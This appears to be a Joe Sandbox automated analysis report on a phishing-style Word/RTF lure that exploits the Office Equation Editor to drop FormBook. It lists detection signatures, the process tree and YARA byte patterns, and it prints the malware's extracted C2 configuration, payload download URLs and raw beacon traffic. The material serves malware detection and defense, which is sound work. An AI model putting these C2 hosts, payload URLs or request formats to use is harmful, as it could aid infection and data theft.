Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revised RFQ-PO180911.doc

Overview

General Information

Sample Name:Revised RFQ-PO180911.doc
Analysis ID:635413
MD5:afaa3f4a9a241593ea30e05773c22980
SHA1:1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
SHA256:25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
Tags:docRFQ
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2068 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1544 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: C6E799EEEBA0345DE98B4E9A6AC76B82)
      • dvukljmnr.exe (PID: 2844 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
        • dvukljmnr.exe (PID: 940 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wuapp.exe (PID: 2996 cmdline: C:\Windows\SysWOW64\wuapp.exe MD5: C8EBA45CEF271BED6C2F0E1965D229EA)
              • cmd.exe (PID: 1820 cmdline: /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Revised RFQ-PO180911.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x5c:$obj2: \objdata
  • 0x7d:$obj2: \objdata
  • 0x315:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.0.dvukljmnr.exe.400000.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.0.dvukljmnr.exe.400000.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.dvukljmnr.exe.400000.9.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        5.2.dvukljmnr.exe.160000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.dvukljmnr.exe.160000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 194.9.94.86, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1544, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1544, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
          Multi AV Scanner detection for submitted file
          Source: Revised RFQ-PO180911.docVirustotal: Detection: 31%Perma Link
          Source: Revised RFQ-PO180911.docReversingLabs: Detection: 32%
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://sanbarts.com/cssati.exeAvira URL Cloud: Label: malware
          Source: http://www.sanbarts.com/cssati.exeAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exeReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeReversingLabs: Detection: 69%
          Source: C:\Users\user\AppData\Roaming\word.exeReversingLabs: Detection: 61%
          Source: 6.0.dvukljmnr.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.dvukljmnr.exe.160000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.dvukljmnr.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.dvukljmnr.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.dvukljmnr.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 194.9.94.86 Port: 80Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 45.120.185.113 Port: 80Jump to behavior
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drStream path '_1715191568/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00405426
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,4_2_00405D9C
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004026A1 FindFirstFileA,4_2_004026A1
          Source: global trafficDNS query: name: sanbarts.com
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.paypal-caseid521.com
          Source: C:\Windows\explorer.exeNetwork Connect: 98.137.244.37 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.storyofsol.com
          Source: C:\Windows\explorer.exeDomain query: www.createacarepack.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.rthearts.com/nk6l/
          Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
          Source: Joe Sandbox ViewASN Name: YAHOO-GQ1US YAHOO-GQ1US
          Source: global trafficHTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1Host: www.createacarepack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 26 May 2022 00:40:19 GMTAccept-Ranges: bytesETag: "4042e42c9970d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 27 May 2022 19:20:07 GMTContent-Length: 299113Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 71 4a a8 a1 10 24 fb a1 10 24 fb a1 10 24 fb 2f 18 7b fb a3 10 24 fb a1 10 25 fb 3b 10 24 fb 22 18 79 fb b0 10 24 fb f5 33 14 fb a8 10 24 fb 66 16 22 fb a0 10 24 fb 52 69 63 68 a1 10 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b6 ce 69 46 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 fa 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sanbarts.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.sanbarts.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 19:21:49 GMTP3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"Vary: Accept-EncodingContent-Length: 73Content-Type: text/html; charset=iso-8859-1Age: 0Connection: closeServer: ATSData Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
